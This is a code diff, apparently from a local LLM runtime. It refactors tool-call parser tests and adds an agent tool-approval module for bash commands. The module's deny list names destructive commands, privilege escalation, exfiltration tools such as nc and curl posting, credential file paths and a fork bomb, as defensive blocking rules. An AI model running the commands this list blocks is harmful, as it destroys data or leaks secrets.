|
||||
return cmp.Equal(a.ToMap(), b.ToMap())
|
||||
})
|
||||
|
||||
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
|
||||
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||
props := api.NewToolPropertiesMap()
|
||||
for k, v := range m {
|
||||
props.Set(k, v)
|
||||
}
|
||||
return props
|
||||
}
|
||||
|
||||
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
|
||||
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||
args := api.NewToolCallFunctionArguments()
|
||||
for k, v := range m {
|
||||
args.Set(k, v)
|
||||
}
|
||||
return args
|
||||
}
|
||||
|
||||
func TestParser(t *testing.T) {
|
||||
qwen, err := template.New("qwen").Parse(`{{if .ToolCalls}}<tool_call>{{range .ToolCalls}}{"name": "{{.Function.Name}}", "arguments": {{.Function.Arguments}}}{{end}}</tool_call>{{end}}`)
|
||||
if err != nil {
|
||||
|
|
@ -44,7 +67,7 @@ func TestParser(t *testing.T) {
|
|||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Required: []string{"city"},
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"format": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The format to return the temperature in",
|
||||
|
|
@ -54,7 +77,7 @@ func TestParser(t *testing.T) {
|
|||
Type: api.PropertyType{"string"},
|
||||
Description: "The city to get the temperature for",
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -65,12 +88,12 @@ func TestParser(t *testing.T) {
|
|||
Description: "Retrieve the current weather conditions for a given location",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The location to get the weather conditions for",
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -95,12 +118,12 @@ func TestParser(t *testing.T) {
|
|||
Description: "Get the address of a given location",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"location": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The location to get the address for",
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -111,7 +134,7 @@ func TestParser(t *testing.T) {
|
|||
Description: "Add two numbers",
|
||||
Parameters: api.ToolFunctionParameters{
|
||||
Type: "object",
|
||||
Properties: map[string]api.ToolProperty{
|
||||
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||
"a": {
|
||||
Type: api.PropertyType{"string"},
|
||||
Description: "The first number to add",
|
||||
|
|
@ -120,7 +143,7 @@ func TestParser(t *testing.T) {
|
|||
Type: api.PropertyType{"string"},
|
||||
Description: "The second number to add",
|
||||
},
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -157,9 +180,9 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_conditions",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "San Francisco",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -174,7 +197,7 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_conditions",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -189,9 +212,9 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_temperature",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"city": "New York",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -213,19 +236,19 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_temperature",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"city": "London",
|
||||
"format": "fahrenheit",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Index: 1,
|
||||
Name: "get_conditions",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -240,19 +263,19 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_temperature",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"city": "London",
|
||||
"format": "fahrenheit",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Index: 1,
|
||||
Name: "get_conditions",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -267,17 +290,17 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "say_hello",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Index: 1,
|
||||
Name: "get_temperature",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"city": "London",
|
||||
"format": "fahrenheit",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -292,16 +315,16 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_conditions",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Index: 1,
|
||||
Name: "get_conditions",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -316,9 +339,9 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_temperature",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"city": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -347,9 +370,9 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_temperature",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"city": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -371,9 +394,9 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_temperature",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"city": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -453,18 +476,18 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_temperature",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"city": "London",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Index: 1,
|
||||
Name: "get_conditions",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -486,9 +509,9 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_conditions",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -528,9 +551,9 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_conditions",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "Tokyo",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -563,7 +586,7 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "say_hello_world",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -591,14 +614,14 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "say_hello_world",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Index: 1,
|
||||
Name: "say_hello",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -624,14 +647,14 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "say_hello",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
{
|
||||
Function: api.ToolCallFunction{
|
||||
Index: 1,
|
||||
Name: "say_hello_world",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -648,7 +671,7 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "say_hello",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -665,7 +688,7 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "say_hello_world",
|
||||
Arguments: api.ToolCallFunctionArguments{},
|
||||
Arguments: api.NewToolCallFunctionArguments(),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -687,9 +710,9 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_address",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "London",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -706,9 +729,9 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "get_address",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"location": "London",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -725,10 +748,10 @@ func TestParser(t *testing.T) {
|
|||
Function: api.ToolCallFunction{
|
||||
Index: 0,
|
||||
Name: "add",
|
||||
Arguments: api.ToolCallFunctionArguments{
|
||||
Arguments: testArgs(map[string]any{
|
||||
"a": "5",
|
||||
"b": "10",
|
||||
},
|
||||
}),
|
||||
},
|
||||
},
|
||||
},
|
||||
|
|
@ -756,7 +779,7 @@ func TestParser(t *testing.T) {
|
|||
}
|
||||
|
||||
for i, want := range tt.calls {
|
||||
if diff := cmp.Diff(calls[i], want); diff != "" {
|
||||
if diff := cmp.Diff(calls[i], want, argsComparer); diff != "" {
|
||||
t.Errorf("Tool call %d mismatch (-got +want):\n%s", i, diff)
|
||||
}
|
||||
}
|
||||
|
|
@ -1316,7 +1339,7 @@ func TestFindArguments(t *testing.T) {
|
|||
got, _ := findArguments(&api.Tool{Function: api.ToolFunction{Name: tt.tool}}, tt.buffer)
|
||||
|
||||
if diff := cmp.Diff(got, tt.want); diff != "" {
|
||||
t.Errorf("scanArguments() args mismatch (-got +want):\n%s", diff)
|
||||
t.Errorf("findArguments() args mismatch (-got +want):\n%s", diff)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
|
|
|||
|
|
@ -0,0 +1,953 @@
|
|||
// Package agent provides agent loop orchestration and tool approval.
|
||||
package agent
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
|
||||
"golang.org/x/term"
|
||||
)
|
||||
|
||||
// ApprovalDecision represents the user's decision for a tool execution.
|
||||
type ApprovalDecision int
|
||||
|
||||
const (
|
||||
// ApprovalDeny means the user denied execution.
|
||||
ApprovalDeny ApprovalDecision = iota
|
||||
// ApprovalOnce means execute this one time only.
|
||||
ApprovalOnce
|
||||
// ApprovalAlways means add to session allowlist.
|
||||
ApprovalAlways
|
||||
)
|
||||
|
||||
// ApprovalResult contains the decision and optional deny reason.
|
||||
type ApprovalResult struct {
|
||||
Decision ApprovalDecision
|
||||
DenyReason string
|
||||
}
|
||||
|
||||
// Option labels for the selector (numbered for quick selection)
|
||||
var optionLabels = []string{
|
||||
"1. Execute once",
|
||||
"2. Always allow",
|
||||
"3. Deny",
|
||||
}
|
||||
|
||||
// autoAllowCommands are commands that are always allowed without prompting.
|
||||
// These are zero-risk, read-only commands.
|
||||
var autoAllowCommands = map[string]bool{
|
||||
"pwd": true,
|
||||
"echo": true,
|
||||
"date": true,
|
||||
"whoami": true,
|
||||
"hostname": true,
|
||||
"uname": true,
|
||||
}
|
||||
|
||||
// autoAllowPrefixes are command prefixes that are always allowed.
|
||||
// These are read-only or commonly-needed development commands.
|
||||
var autoAllowPrefixes = []string{
|
||||
// Git read-only
|
||||
"git status", "git log", "git diff", "git branch", "git show",
|
||||
"git remote -v", "git tag", "git stash list",
|
||||
// Package managers - run scripts
|
||||
"npm run", "npm test", "npm start",
|
||||
"bun run", "bun test",
|
||||
"uv run",
|
||||
"yarn run", "yarn test",
|
||||
"pnpm run", "pnpm test",
|
||||
// Package info
|
||||
"go list", "go version", "go env",
|
||||
"npm list", "npm ls", "npm version",
|
||||
"pip list", "pip show",
|
||||
"cargo tree", "cargo version",
|
||||
// Build commands
|
||||
"go build", "go test", "go fmt", "go vet",
|
||||
"make", "cmake",
|
||||
"cargo build", "cargo test", "cargo check",
|
||||
}
|
||||
|
||||
// denyPatterns are dangerous command patterns that are always blocked.
|
||||
var denyPatterns = []string{
|
||||
// Destructive commands
|
||||
"rm -rf", "rm -fr",
|
||||
"mkfs", "dd if=", "dd of=",
|
||||
"shred",
|
||||
"> /dev/", ">/dev/",
|
||||
// Privilege escalation
|
||||
"sudo ", "su ", "doas ",
|
||||
"chmod 777", "chmod -R 777",
|
||||
"chown ", "chgrp ",
|
||||
// Network exfiltration
|
||||
"curl -d", "curl --data", "curl -X POST", "curl -X PUT",
|
||||
"wget --post",
|
||||
"nc ", "netcat ",
|
||||
"scp ", "rsync ",
|
||||
// History and credentials
|
||||
"history",
|
||||
".bash_history", ".zsh_history",
|
||||
".ssh/id_rsa", ".ssh/id_dsa", ".ssh/id_ecdsa", ".ssh/id_ed25519",
|
||||
".ssh/config",
|
||||
".aws/credentials", ".aws/config",
|
||||
".gnupg/",
|
||||
"/etc/shadow", "/etc/passwd",
|
||||
// Dangerous patterns
|
||||
":(){ :|:& };:", // fork bomb
|
||||
"chmod +s", // setuid
|
||||
"mkfifo",
|
||||
}
|
||||
|
||||
// denyPathPatterns are file patterns that should never be accessed.
|
||||
// These are checked as exact filename matches or path suffixes.
|
||||
var denyPathPatterns = []string{
|
||||
".env",
|
||||
".env.local",
|
||||
".env.production",
|
||||
"credentials.json",
|
||||
"secrets.json",
|
||||
"secrets.yaml",
|
||||
"secrets.yml",
|
||||
".pem",
|
||||
".key",
|
||||
}
|
||||
|
||||
// ApprovalManager manages tool execution approvals.
|
||||
type ApprovalManager struct {
|
||||
allowlist map[string]bool // exact matches
|
||||
prefixes map[string]bool // prefix matches for bash commands (e.g., "cat:tools/")
|
||||
mu sync.RWMutex
|
||||
}
|
||||
|
||||
// NewApprovalManager creates a new approval manager.
|
||||
func NewApprovalManager() *ApprovalManager {
|
||||
return &ApprovalManager{
|
||||
allowlist: make(map[string]bool),
|
||||
prefixes: make(map[string]bool),
|
||||
}
|
||||
}
|
||||
|
||||
// IsAutoAllowed checks if a bash command is auto-allowed (no prompt needed).
|
||||
func IsAutoAllowed(command string) bool {
|
||||
command = strings.TrimSpace(command)
|
||||
|
||||
// Check exact command match (first word)
|
||||
fields := strings.Fields(command)
|
||||
if len(fields) > 0 && autoAllowCommands[fields[0]] {
|
||||
return true
|
||||
}
|
||||
|
||||
// Check prefix match
|
||||
for _, prefix := range autoAllowPrefixes {
|
||||
if strings.HasPrefix(command, prefix) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// IsDenied checks if a bash command matches deny patterns.
|
||||
// Returns true and the matched pattern if denied.
|
||||
func IsDenied(command string) (bool, string) {
|
||||
commandLower := strings.ToLower(command)
|
||||
|
||||
// Check deny patterns
|
||||
for _, pattern := range denyPatterns {
|
||||
if strings.Contains(commandLower, strings.ToLower(pattern)) {
|
||||
return true, pattern
|
||||
}
|
||||
}
|
||||
|
||||
// Check deny path patterns
|
||||
for _, pattern := range denyPathPatterns {
|
||||
if strings.Contains(commandLower, strings.ToLower(pattern)) {
|
||||
return true, pattern
|
||||
}
|
||||
}
|
||||
|
||||
return false, ""
|
||||
}
|
||||
|
||||
// FormatDeniedResult returns the tool result message when a command is blocked.
|
||||
func FormatDeniedResult(command string, pattern string) string {
|
||||
return fmt.Sprintf("Command blocked: this command matches a dangerous pattern (%s) and cannot be executed. If this command is necessary, please ask the user to run it manually.", pattern)
|
||||
}
|
||||
|
||||
// extractBashPrefix extracts a prefix pattern from a bash command.
|
||||
// For commands like "cat tools/tools_test.go | head -200", returns "cat:tools/"
|
||||
// For commands without path args, returns empty string.
|
||||
func extractBashPrefix(command string) string {
|
||||
// Split command by pipes and get the first part
|
||||
parts := strings.Split(command, "|")
|
||||
firstCmd := strings.TrimSpace(parts[0])
|
||||
|
||||
// Split into command and args
|
||||
fields := strings.Fields(firstCmd)
|
||||
if len(fields) < 2 {
|
||||
return ""
|
||||
}
|
||||
|
||||
baseCmd := fields[0]
|
||||
// Common commands that benefit from prefix allowlisting
|
||||
// These are typically safe for read operations on specific directories
|
||||
safeCommands := map[string]bool{
|
||||
"cat": true, "ls": true, "head": true, "tail": true,
|
||||
"less": true, "more": true, "file": true, "wc": true,
|
||||
"grep": true, "find": true, "tree": true, "stat": true,
|
||||
"sed": true,
|
||||
}
|
||||
|
||||
if !safeCommands[baseCmd] {
|
||||
return ""
|
||||
}
|
||||
|
||||
// Find the first path-like argument (must contain / or start with .)
|
||||
// First pass: look for clear paths (containing / or starting with .)
|
||||
for _, arg := range fields[1:] {
|
||||
// Skip flags
|
||||
if strings.HasPrefix(arg, "-") {
|
||||
continue
|
||||
}
|
||||
// Skip numeric arguments (e.g., "head -n 100")
|
||||
if isNumeric(arg) {
|
||||
continue
|
||||
}
|
||||
// Only process if it looks like a path (contains / or starts with .)
|
||||
if !strings.Contains(arg, "/") && !strings.HasPrefix(arg, ".") {
|
||||
continue
|
||||
}
|
||||
// If arg ends with /, it's a directory - use it directly
|
||||
if strings.HasSuffix(arg, "/") {
|
||||
return fmt.Sprintf("%s:%s", baseCmd, arg)
|
||||
}
|
||||
// Get the directory part of a file path
|
||||
dir := filepath.Dir(arg)
|
||||
if dir == "." {
|
||||
// Path is just a directory like "tools" or "src" (no trailing /)
|
||||
return fmt.Sprintf("%s:%s/", baseCmd, arg)
|
||||
}
|
||||
return fmt.Sprintf("%s:%s/", baseCmd, dir)
|
||||
}
|
||||
|
||||
// Second pass: if no clear path found, use the first non-flag argument as a filename
|
||||
for _, arg := range fields[1:] {
|
||||
if strings.HasPrefix(arg, "-") {
|
||||
continue
|
||||
}
|
||||
if isNumeric(arg) {
|
||||
continue
|
||||
}
|
||||
// Treat as filename in current dir
|
||||
return fmt.Sprintf("%s:./", baseCmd)
|
||||
}
|
||||
|
||||
return ""
|
||||
}
|
||||
|
||||
// isNumeric checks if a string is a numeric value
|
||||
func isNumeric(s string) bool {
|
||||
for _, c := range s {
|
||||
if c < '0' || c > '9' {
|
||||
return false
|
||||
}
|
||||
}
|
||||
return len(s) > 0
|
||||
}
|
||||
|
||||
// isCommandOutsideCwd checks if a bash command targets paths outside the current working directory.
|
||||
// Returns true if any path argument would access files outside cwd.
|
||||
func isCommandOutsideCwd(command string) bool {
|
||||
cwd, err := os.Getwd()
|
||||
if err != nil {
|
||||
return false // Can't determine, assume safe
|
||||
}
|
||||
|
||||
// Split command by pipes and semicolons to check all parts
|
||||
parts := strings.FieldsFunc(command, func(r rune) bool {
|
||||
return r == '|' || r == ';' || r == '&'
|
||||
})
|
||||
|
||||
for _, part := range parts {
|
||||
part = strings.TrimSpace(part)
|
||||
fields := strings.Fields(part)
|
||||
if len(fields) == 0 {
|
||||
continue
|
||||
}
|
||||
|
||||
// Check each argument that looks like a path
|
||||
for _, arg := range fields[1:] {
|
||||
// Skip flags
|
||||
if strings.HasPrefix(arg, "-") {
|
||||
continue
|
||||
}
|
||||
|
||||
// Treat POSIX-style absolute paths as outside cwd on all platforms.
|
||||
if strings.HasPrefix(arg, "/") || strings.HasPrefix(arg, "\\") {
|
||||
return true
|
||||
}
|
||||
|
||||
// Check for absolute paths outside cwd
|
||||
if filepath.IsAbs(arg) {
|
||||
absPath := filepath.Clean(arg)
|
||||
if !strings.HasPrefix(absPath, cwd) {
|
||||
return true
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
// Check for relative paths that escape cwd (e.g., ../foo, /etc/passwd)
|
||||
if strings.HasPrefix(arg, "..") {
|
||||
// Resolve the path relative to cwd
|
||||
absPath := filepath.Join(cwd, arg)
|
||||
absPath = filepath.Clean(absPath)
|
||||
if !strings.HasPrefix(absPath, cwd) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
|
||||
// Check for home directory expansion
|
||||
if strings.HasPrefix(arg, "~") {
|
||||
home, err := os.UserHomeDir()
|
||||
if err == nil && !strings.HasPrefix(home, cwd) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// AllowlistKey generates the key for exact allowlist lookup.
|
||||
func AllowlistKey(toolName string, args map[string]any) string {
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
return fmt.Sprintf("bash:%s", cmd)
|
||||
}
|
||||
}
|
||||
return toolName
|
||||
}
|
||||
|
||||
// IsAllowed checks if a tool/command is allowed (exact match or prefix match).
|
||||
func (a *ApprovalManager) IsAllowed(toolName string, args map[string]any) bool {
|
||||
a.mu.RLock()
|
||||
defer a.mu.RUnlock()
|
||||
|
||||
// Check exact match first
|
||||
key := AllowlistKey(toolName, args)
|
||||
if a.allowlist[key] {
|
||||
return true
|
||||
}
|
||||
|
||||
// For bash commands, check prefix matches
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
prefix := extractBashPrefix(cmd)
|
||||
if prefix != "" && a.prefixes[prefix] {
|
||||
return true
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check if tool itself is allowed (non-bash)
|
||||
if toolName != "bash" && a.allowlist[toolName] {
|
||||
return true
|
||||
}
|
||||
|
||||
return false
|
||||
}
|
||||
|
||||
// AddToAllowlist adds a tool/command to the session allowlist.
|
||||
// For bash commands, it adds the prefix pattern instead of exact command.
|
||||
func (a *ApprovalManager) AddToAllowlist(toolName string, args map[string]any) {
|
||||
a.mu.Lock()
|
||||
defer a.mu.Unlock()
|
||||
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
prefix := extractBashPrefix(cmd)
|
||||
if prefix != "" {
|
||||
a.prefixes[prefix] = true
|
||||
return
|
||||
}
|
||||
// Fall back to exact match if no prefix extracted
|
||||
a.allowlist[fmt.Sprintf("bash:%s", cmd)] = true
|
||||
return
|
||||
}
|
||||
}
|
||||
a.allowlist[toolName] = true
|
||||
}
|
||||
|
||||
// RequestApproval prompts the user for approval to execute a tool.
|
||||
// Returns the decision and optional deny reason.
|
||||
func (a *ApprovalManager) RequestApproval(toolName string, args map[string]any) (ApprovalResult, error) {
|
||||
// Format tool info for display
|
||||
toolDisplay := formatToolDisplay(toolName, args)
|
||||
|
||||
// Enter raw mode for interactive selection
|
||||
fd := int(os.Stdin.Fd())
|
||||
oldState, err := term.MakeRaw(fd)
|
||||
if err != nil {
|
||||
// Fallback to simple input if terminal control fails
|
||||
return a.fallbackApproval(toolDisplay)
|
||||
}
|
||||
|
||||
// Flush any pending stdin input before starting selector
|
||||
// This prevents buffered input from causing double-press issues
|
||||
flushStdin(fd)
|
||||
|
||||
// Check if bash command targets paths outside cwd
|
||||
isWarning := false
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
isWarning = isCommandOutsideCwd(cmd)
|
||||
}
|
||||
}
|
||||
|
||||
// Run interactive selector
|
||||
selected, denyReason, err := runSelector(fd, oldState, toolDisplay, isWarning)
|
||||
if err != nil {
|
||||
term.Restore(fd, oldState)
|
||||
return ApprovalResult{Decision: ApprovalDeny}, err
|
||||
}
|
||||
|
||||
// Restore terminal
|
||||
term.Restore(fd, oldState)
|
||||
|
||||
// Map selection to decision
|
||||
switch selected {
|
||||
case -1: // Ctrl+C cancelled
|
||||
return ApprovalResult{Decision: ApprovalDeny, DenyReason: "cancelled"}, nil
|
||||
case 0:
|
||||
return ApprovalResult{Decision: ApprovalOnce}, nil
|
||||
case 1:
|
||||
return ApprovalResult{Decision: ApprovalAlways}, nil
|
||||
default:
|
||||
return ApprovalResult{Decision: ApprovalDeny, DenyReason: denyReason}, nil
|
||||
}
|
||||
}
|
||||
|
||||
// formatToolDisplay creates the display string for a tool call.
|
||||
func formatToolDisplay(toolName string, args map[string]any) string {
|
||||
var sb strings.Builder
|
||||
|
||||
// For bash, show command directly
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
|
||||
sb.WriteString(fmt.Sprintf("Command: %s", cmd))
|
||||
return sb.String()
|
||||
}
|
||||
}
|
||||
|
||||
// For web search, show query
|
||||
if toolName == "web_search" {
|
||||
if query, ok := args["query"].(string); ok {
|
||||
sb.WriteString(fmt.Sprintf("Tool: %s\n", toolName))
|
||||
sb.WriteString(fmt.Sprintf("Query: %s", query))
|
||||
return sb.String()
|
||||
}
|
||||
}
|
||||
|
||||
// Generic display
|
||||
sb.WriteString(fmt.Sprintf("Tool: %s", toolName))
|
||||
if len(args) > 0 {
|
||||
sb.WriteString("\nArguments: ")
|
||||
first := true
|
||||
for k, v := range args {
|
||||
if !first {
|
||||
sb.WriteString(", ")
|
||||
}
|
||||
sb.WriteString(fmt.Sprintf("%s=%v", k, v))
|
||||
first = false
|
||||
}
|
||||
}
|
||||
return sb.String()
|
||||
}
|
||||
|
||||
// selectorState holds the state for the interactive selector
|
||||
type selectorState struct {
|
||||
toolDisplay string
|
||||
selected int
|
||||
totalLines int
|
||||
termWidth int
|
||||
termHeight int
|
||||
boxWidth int
|
||||
innerWidth int
|
||||
denyReason string // deny reason (always visible in box)
|
||||
isWarning bool // true if command targets paths outside cwd (red box)
|
||||
}
|
||||
|
||||
// runSelector runs the interactive selector and returns the selected index and optional deny reason.
|
||||
// If isWarning is true, the box is rendered in red to indicate the command targets paths outside cwd.
|
||||
func runSelector(fd int, oldState *term.State, toolDisplay string, isWarning bool) (int, string, error) {
|
||||
state := &selectorState{
|
||||
toolDisplay: toolDisplay,
|
||||
selected: 0,
|
||||
isWarning: isWarning,
|
||||
}
|
||||
|
||||
// Get terminal size
|
||||
state.termWidth, state.termHeight, _ = term.GetSize(fd)
|
||||
if state.termWidth < 20 {
|
||||
state.termWidth = 80 // fallback
|
||||
}
|
||||
|
||||
// Calculate box width: 90% of terminal, min 24, max 60
|
||||
state.boxWidth = (state.termWidth * 90) / 100
|
||||
if state.boxWidth > 60 {
|
||||
state.boxWidth = 60
|
||||
}
|
||||
if state.boxWidth < 24 {
|
||||
state.boxWidth = 24
|
||||
}
|
||||
// Ensure box fits in terminal
|
||||
